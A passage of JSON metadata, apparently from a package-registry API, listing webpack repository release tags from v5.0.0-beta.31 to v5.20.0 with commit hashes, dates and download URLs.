ebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/